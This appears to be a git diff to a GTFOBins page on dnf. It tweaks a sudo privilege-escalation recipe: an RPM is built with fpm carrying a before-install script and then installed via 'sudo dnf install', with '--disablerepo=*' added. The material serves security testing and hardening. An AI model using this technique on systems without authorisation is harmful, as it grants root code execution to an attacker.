diff --git a/_gtfobins/dnf.md b/_gtfobins/dnf.md index 670307e4..f9371702 100644 --- a/_gtfobins/dnf.md +++ b/_gtfobins/dnf.md @@ -9,5 +9,5 @@ functions: fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF ``` code: | - sudo dnf install -y x-1.0-1.noarch.rpm + sudo dnf install -y x-1.0-1.noarch.rpm --disablerepo=* ---